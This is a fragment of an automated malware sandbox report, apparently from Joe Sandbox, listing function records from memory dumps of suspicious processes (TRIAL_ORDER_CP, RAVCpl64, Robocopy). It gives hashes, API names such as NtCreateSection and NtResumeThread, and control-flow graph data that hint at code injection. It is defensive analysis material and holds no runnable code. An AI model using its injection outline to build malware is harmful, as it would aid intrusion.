                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: dc83136ee5e58573b10fd91d92936c604dc796e2094044f4db1878340deac581
                                          • Instruction ID: 06562d1f8e03d4180b9f1f5d3e1ffe0f3bb68d6ef270cd9c9c6ff021bc53b14e
                                          • Opcode Fuzzy Hash: dc83136ee5e58573b10fd91d92936c604dc796e2094044f4db1878340deac581
                                          • Instruction Fuzzy Hash: 01514879700622DFEB08CE18D8A0A19B7EAFB8A355B14417DD906DB761DB71EC41CB81
                                          Function 33B47A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                          • String ID:
                                          • API String ID: 4281723722-0
                                          • Opcode ID: 15b88d257d41898ec34fe26ea9f97b48e07fb7c727adead0e2a0524be6c4bf28
                                          • Instruction ID: 82f286e6a4c04a96a154b5d5d0dd4a946a393778848fd14115a9b4893819f6a2
                                          • Opcode Fuzzy Hash: 15b88d257d41898ec34fe26ea9f97b48e07fb7c727adead0e2a0524be6c4bf28
                                          • Instruction Fuzzy Hash: 53310475E012A89FCB05EFA8D844A9DBBF0FB48324F15456AE511BB290DB359D41CF50
                                          Function 33B158E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 0c78198e277650dd25c236ae2eb5a377c1ea5da8aa1d45e4342b75a5ccfd5708
                                          • Instruction ID: fd622b52fdba60797bfe79de72ed372dfae784383f42c05029fa9fe2a17a3ad4
                                          • Opcode Fuzzy Hash: 0c78198e277650dd25c236ae2eb5a377c1ea5da8aa1d45e4342b75a5ccfd5708
                                          • Instruction Fuzzy Hash: C0322174D043699FEB21CF64C884BDABBB4EF08304F0441FAD459A7681EBB49A94CF91
                                          Function 33B44B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$Flst
                                          • API String ID: 0-758220159
                                          • Opcode ID: 82ef47774978e0a7a32ac450af05046b1715b67fd40e280eb5403a48b4a05c2e
                                          • Instruction ID: edb8bc007a67c72db8440d1ae0561f3dd708d41d97352276d44f666c7a835f6b
                                          • Opcode Fuzzy Hash: 82ef47774978e0a7a32ac450af05046b1715b67fd40e280eb5403a48b4a05c2e
                                          • Instruction Fuzzy Hash: 3E519CB5E002A88FEB14DF98C484759FBF8EF44794F1CC03AD049AB241EB709985CB94
                                          Function 33B10485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • kLsE, xrefs: 33B105FE
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33B10586
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 3446177414-2547482624
                                          • Opcode ID: c7e966e00535e55a76f66238d315267835ddd3f0eecb7b6221258c06337b15de
                                          • Instruction ID: 0fdd8a546b930d0484783bd87698846b0adf1044284509036982f6eab86bb5f0
                                          • Opcode Fuzzy Hash: c7e966e00535e55a76f66238d315267835ddd3f0eecb7b6221258c06337b15de
                                          • Instruction Fuzzy Hash: 3851BDB5E00756DFE710DFA6C4806ABB7F8EF44304F04843ED59987641EB789615CBA1
                                          Function 33B0DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: 0$0
                                          • API String ID: 3446177414-203156872
                                          • Opcode ID: 30f9104c905ac55ad63c49482d45a797de517e77974b69e33971b7c7f8b8f430
                                          • Instruction ID: 60eb42364b723bb4299319410785131968d1f549de7f2e8985261160ebd9ef27
                                          • Opcode Fuzzy Hash: 30f9104c905ac55ad63c49482d45a797de517e77974b69e33971b7c7f8b8f430
                                          • Instruction Fuzzy Hash: FA415BB1A087459FD300CF28C854A4ABBE4FB88354F048A3EF588DB241D771EA05CF86

                                          Execution Graph

                                          Execution Coverage:1.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:30
                                          Total number of Limit Nodes:0
                                          execution_graph 3994 4742877 3997 474289c 3994->3997 3995 47428c1 3996 47428d6 SleepEx 3996->3997 3999 474290a 3996->3999 3997->3995 3997->3996 3998 4742949 NtResumeThread 3998->3995 3999->3995 3999->3998 4020 47426a1 4023 47426b8 4020->4023 4021 474270b SleepEx 4022 4742756 NtCreateSection 4021->4022 4021->4023 4024 4742733 4022->4024 4023->4021 4023->4024 4000 47426f8 4002 4742706 4000->4002 4001 474270b SleepEx 4001->4002 4003 4742756 NtCreateSection 4001->4003 4002->4001 4004 4742733 4002->4004 4003->4004 4005 47425f8 4006 47425a2 4005->4006 4006->4005 4007 4742650 4006->4007 4008 474270b SleepEx 4006->4008 4008->4006 4009 4742756 NtCreateSection 4008->4009 4009->4007 4010 4746a5a 4012 4746a5f 4010->4012 4011 4746b67 4012->4011 4014 4742876 4012->4014 4016 4742877 4014->4016 4015 47428d6 SleepEx 4015->4016 4019 474290a 4015->4019 4016->4015 4017 47428c1 4016->4017 4017->4011 4018 4742949 NtResumeThread 4018->4017 4019->4017 4019->4018

                                          Executed Functions

                                          Function 047425F8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 240COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 47425f8-47425fe 1 4742646-474264b 0->1 2 4742600-4742604 0->2 5 4742615-4742628 1->5 6 474264d-474264e 1->6 3 4742606-4742612 2->3 4 47425a2-47425ed 2->4 3->5 4->0 7 47426a3-47426ac 5->7 8 474262a-474262d 5->8 9 4742650-474265a 6->9 10 47426b1-47426b6 6->10 7->10 13 474269d-474269f 8->13 14 474262f-4742645 8->14 15 474266b-4742691 9->15 11 4742707-4742712 SleepEx 10->11 12 47426b8-47426b9 10->12 21 4742714-4742718 11->21 22 4742756-47427ab NtCreateSection 11->22 18 4742706 12->18 14->1 14->15 16 4742665-4742691 15->16 17 4742693-4742698 15->17 16->16 16->17 17->13 18->11 25 474272c-4742731 21->25 26 474271a-4742727 call 474fb46 21->26 23 4742733-474273a 22->23 24 47427ad-47427c6 22->24 28 474273c-4742755 23->28 24->23 30 47427cc-474280b 24->30 25->18 25->23 26->25 30->23 32 4742811-474284f 30->32 32->23 34 4742855-474286d 32->34 34->28
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.275190559830.0000000004680000.00000040.00000001.00040000.00000000.sdmp, Offset: 04680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4680000_RAVCpl64.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@
                                          • API String ID: 0-149943524
                                          • Opcode ID: 4cd786c1afcd05deefb4027857f81954759db7128e27a34b89f237d3ad011c4a
                                          • Instruction ID: a072bc58672bbe3134453e1114100ffa13c43a0b6a9f1ab34bf6abb53c2751ac
                                          • Opcode Fuzzy Hash: 4cd786c1afcd05deefb4027857f81954759db7128e27a34b89f237d3ad011c4a
                                          • Instruction Fuzzy Hash: 44816670928B588FC715DF28D8852DABBF4FF89740F1005AEE98697242DB30E556CBC6
                                          Function 04742877 Relevance: 3.1, APIs: 2, Instructions: 92nativethreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.275190559830.0000000004680000.00000040.00000001.00040000.00000000.sdmp, Offset: 04680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4680000_RAVCpl64.jbxd
                                          Similarity
                                          • API ID: ResumeSleepThread
                                          • String ID:
                                          • API String ID: 1530989685-0
                                          • Opcode ID: 3f84239d0238116e6c3b9430dfe7797fea4f696cdae82638e673c8342d94a37c
                                          • Instruction ID: 044eb763c7fc2d3ecb0c1e241c14973b7a8d7a03ad7fe4c1ee5589633fb66533
                                          • Opcode Fuzzy Hash: 3f84239d0238116e6c3b9430dfe7797fea4f696cdae82638e673c8342d94a37c
                                          • Instruction Fuzzy Hash: B921F430608B4D8FD764EF6994897BAB7D1FB94354F00076AE85AC7392EB70E4518741
                                          Function 047426F8 Relevance: 1.5, APIs: 1, Instructions: 39nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 55 47426f8-4742704 56 4742706-4742712 SleepEx 55->56 59 4742714-4742718 56->59 60 4742756-47427ab NtCreateSection 56->60 63 474272c-4742731 59->63 64 474271a-4742727 call 474fb46 59->64 61 4742733-474273a 60->61 62 47427ad-47427c6 60->62 66 474273c-4742755 61->66 62->61 68 47427cc-474280b 62->68 63->56 63->61 64->63 68->61 70 4742811-474284f 68->70 70->61 72 4742855-474286d 70->72 72->66
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.275190559830.0000000004680000.00000040.00000001.00040000.00000000.sdmp, Offset: 04680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4680000_RAVCpl64.jbxd
                                          Similarity
                                          • API ID: CreateSectionSleep
                                          • String ID:
                                          • API String ID: 2866269021-0
                                          • Opcode ID: 68f963f6fd3a56fe86fc495ea7cf87e18dd6850058086afda96863881e7b11cf
                                          • Instruction ID: eb9d1734d1c52a8919b58ec76a6c349d4d435d8f0fa262f8866a88712731a16b
                                          • Opcode Fuzzy Hash: 68f963f6fd3a56fe86fc495ea7cf87e18dd6850058086afda96863881e7b11cf
                                          • Instruction Fuzzy Hash: B3F059315187048BE71B4F28D8872FDB7A5FBC1370F10065AC19503693E735A076C6CA

                                          Execution Graph

                                          Execution Coverage:0.4%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:9
                                          Total number of Limit Nodes:1
                                          execution_graph 71404 45a29f0 LdrInitializeThunk 71405 488efda 71406 488f00d 71405->71406 71407 488f189 NtQueryInformationProcess 71406->71407 71408 488f1c3 71406->71408 71407->71408 71415 45a2b20 71417 45a2b2a 71415->71417 71418 45a2b3f LdrInitializeThunk 71417->71418 71419 45a2b31 71417->71419

                                          Executed Functions

                                          Function 0488EFDA Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 546nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 488efda-488f00b 1 488f029-488f048 call 4891328 call 488cfd8 0->1 2 488f00d-488f024 call 4891308 0->2 8 488f04e-488f15a call 488ef18 call 4891328 call 4895294 call 4880398 call 48908d8 call 4880398 call 48908d8 call 4892ff8 1->8 9 488f642-488f64d 1->9 2->1 26 488f160-488f1be call 4880398 call 48908d8 NtQueryInformationProcess call 4891328 8->26 27 488f636-488f63d call 488ef18 8->27 34 488f1c3-488f1fa call 4880398 call 48908d8 26->34 27->9 39 488f1fc-488f209 34->39 40 488f20e-488f28a call 48952a2 call 4880398 call 48908d8 34->40 39->27 40->39 49 488f290-488f29f call 48952cc 40->49 52 488f2ec-488f332 call 4880398 call 48908d8 call 4893958 49->52 53 488f2a1-488f2e7 call 4892018 49->53 63 488f351-488f44d call 4880398 call 48908d8 call 48952da call 4880398 call 48908d8 call 4893318 call 48912d8 * 3 call 48952cc 52->63 64 488f334-488f34c 52->64 53->27 87 488f44f-488f47e call 48952cc call 48912d8 call 489532e call 48952e8 63->87 88 488f480-488f495 call 48952cc 63->88 64->27 99 488f4d5-488f4df 87->99 93 488f4be-488f4d0 call 4891f58 88->93 94 488f497-488f4b9 call 4892ac8 88->94 93->99 94->93 101 488f5ad-488f616 call 4880398 call 48908d8 call 4893c78 99->101 102 488f4e5-488f535 call 4880398 call 48908d8 call 4893638 call 48952cc 99->102 101->27 128 488f618-488f631 call 4891308 101->128 121 488f56a-488f571 102->121 122 488f537-488f560 call 4895378 call 489532e 102->122 124 488f57d-488f588 121->124 125 488f573-488f57b call 48952cc 121->125 122->121 124->101 130 488f58a-488f5a8 call 4893f98 124->130 125->101 125->124 128->27 130->101
                                          APIs
                                          • NtQueryInformationProcess.NTDLL ref: 0488F1A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272503644308.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4880000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InformationProcessQuery
                                          • String ID: 0
                                          • API String ID: 1778838933-4108050209
                                          • Opcode ID: 89c8f4b0822c9db942f97866bfe549d97038f90a2278141de3cd7be466b1712c
                                          • Instruction ID: cbec915958ba4433adec737661099e8ee3bec23d56925af43b4380eff53ff19e
                                          • Opcode Fuzzy Hash: 89c8f4b0822c9db942f97866bfe549d97038f90a2278141de3cd7be466b1712c
                                          • Instruction Fuzzy Hash: D6123A70518B8C8FDFA5EF68C894ADE77E0FB99304F400A1ED94AD7640DF74A6458B42
                                          Function 045A34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 152 45a34e0-45a34ec LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3156926997b1f7a24ca18f42b1de3473d130d2458d1ce1ef292b428d4d279efb
                                          • Instruction ID: eb307aba56701240af6218b3ca6731ef01073b2e37c1c18d4b4ddffb52fdb928
                                          • Opcode Fuzzy Hash: 3156926997b1f7a24ca18f42b1de3473d130d2458d1ce1ef292b428d4d279efb
                                          • Instruction Fuzzy Hash: A290023160510403F50071584624786104997D0245F61DC15B0C15568DC7A5D95575E2
                                          Function 045A2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 147 45a2c30-45a2c3c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: dcc4041cddedc3b505677dc83678c3a465a3fd84ee3a5cea1983ffdc878e6519
                                          • Instruction ID: 9c8dff7fe18b5690daab9d8b3dca5e3d72a1c5367f25d250763bd25c49f96023
                                          • Opcode Fuzzy Hash: dcc4041cddedc3b505677dc83678c3a465a3fd84ee3a5cea1983ffdc878e6519
                                          • Instruction Fuzzy Hash: 7E90022921300003F5807158551868A004997D1246F91EC19B0806558CC925D86D7361
                                          Function 045A2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 148 45a2cf0-45a2cfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bde475cfac802d74e2435463f7e7f60e2c64770cfd5bee0486addbfc153bf9a
                                          • Instruction ID: e1587b0c88574fefa4009bdcdb6ced36c8084046698c70c4aae5ec19cbe966ed
                                          • Opcode Fuzzy Hash: 4bde475cfac802d74e2435463f7e7f60e2c64770cfd5bee0486addbfc153bf9a
                                          • Instruction Fuzzy Hash: 1F900221242041537945B1584514587404AA7E0285791D816B1C05950CC536E85AF661
                                          Function 045A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 149 45a2d10-45a2d1c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ab178b0aee38f2db8c7c44d4e8059a1718a6ec9e4b5b588cb736d623f40070cd
                                          • Instruction ID: bfcd5503f73a43fd52bc9abab31c37183745889230756d38688a8654d3695a84
                                          • Opcode Fuzzy Hash: ab178b0aee38f2db8c7c44d4e8059a1718a6ec9e4b5b588cb736d623f40070cd
                                          • Instruction Fuzzy Hash: 1990023120100413F51171584614787004D97D0285F91DC16B0C15558DD666D956B161
                                          Function 045A2E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 150 45a2e50-45a2e5c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3b51d0afbca9827943fd2a43c668f5eabea57537bca527d75436cd8b2fef47ec
                                          • Instruction ID: 4b670707f500462e9b44174189f425dd4b7b38c29020e4bd459c8c7d04584bae
                                          • Opcode Fuzzy Hash: 3b51d0afbca9827943fd2a43c668f5eabea57537bca527d75436cd8b2fef47ec
                                          • Instruction Fuzzy Hash: 2190026134100443F50071584524B860049D7E1345F51D819F1855554DC629DC567166
                                          Function 045A2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 151 45a2f00-45a2f0c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 49c2d0e779d563bb23352daa92360bd16e763106fa607a610a4ddb80242f9c28
                                          • Instruction ID: e153d33eb65566778396f112fe0df33d19057baa2a2c50bd0ee31d3e3b1071af
                                          • Opcode Fuzzy Hash: 49c2d0e779d563bb23352daa92360bd16e763106fa607a610a4ddb80242f9c28
                                          • Instruction Fuzzy Hash: 6490022121180043F60075684D24B87004997D0347F51D919B0945554CC925D8657561
                                          Function 045A29F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 140 45a29f0-45a29fc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 598a337bf6292329d3e42738856c2c13f72dbc003d5fcf17c0eac20eac1e83f7
                                          • Instruction ID: dacc72654cd29462f6d95c3a361c8d5ea551845a4d8dcd305cbab0dcc0547b3c
                                          • Opcode Fuzzy Hash: 598a337bf6292329d3e42738856c2c13f72dbc003d5fcf17c0eac20eac1e83f7
                                          • Instruction Fuzzy Hash: 52900225211000032505B5580714587008A97D5395351D825F1806550CD631D8657161
                                          Function 045A2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 141 45a2a80-45a2a8c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ec3fdabb70565c354111a57b315f37d383fa0bded8c1e7d88a88a89a52e2a7ed
                                          • Instruction ID: 530fb4ddaee1b9dff1bbb31fbae1cea62c7f043444f924bb267dfe30427e795c
                                          • Opcode Fuzzy Hash: ec3fdabb70565c354111a57b315f37d383fa0bded8c1e7d88a88a89a52e2a7ed
                                          • Instruction Fuzzy Hash: C290026120200003650571584524696404E97E0245B51D825F1805590DC535D8957165
                                          Function 045A2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 143 45a2b10-45a2b1c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2ca25a81eb6a57207ad924c0084152c1a18e94194a66207b171b6136398f5565
                                          • Instruction ID: 5e621215876d71936f3aa3114b377d82d787e74294a2cf2eaefc5fa41eb37e64
                                          • Opcode Fuzzy Hash: 2ca25a81eb6a57207ad924c0084152c1a18e94194a66207b171b6136398f5565
                                          • Instruction Fuzzy Hash: BE90023120100803F580715845146CA004997D1345F91D819B0816654DCA25DA5D77E1
                                          Function 045A2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 142 45a2b00-45a2b0c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 66cd39db98988a4cac1d215a8ce04188dacf0eebece65324a272d29f3a1fc4d8
                                          • Instruction ID: 770a375805cfd72b4924eddb210454ee9d364d01d7eb066c903f0a59b050f701
                                          • Opcode Fuzzy Hash: 66cd39db98988a4cac1d215a8ce04188dacf0eebece65324a272d29f3a1fc4d8
                                          • Instruction Fuzzy Hash: D590023120504843F54071584514AC6005997D0349F51D815B0855694DD635DD59B6A1
                                          Function 045A2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 146 45a2bc0-45a2bcc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000006.00000002.272502876792.0000000004659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_4530000_Robocopy.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
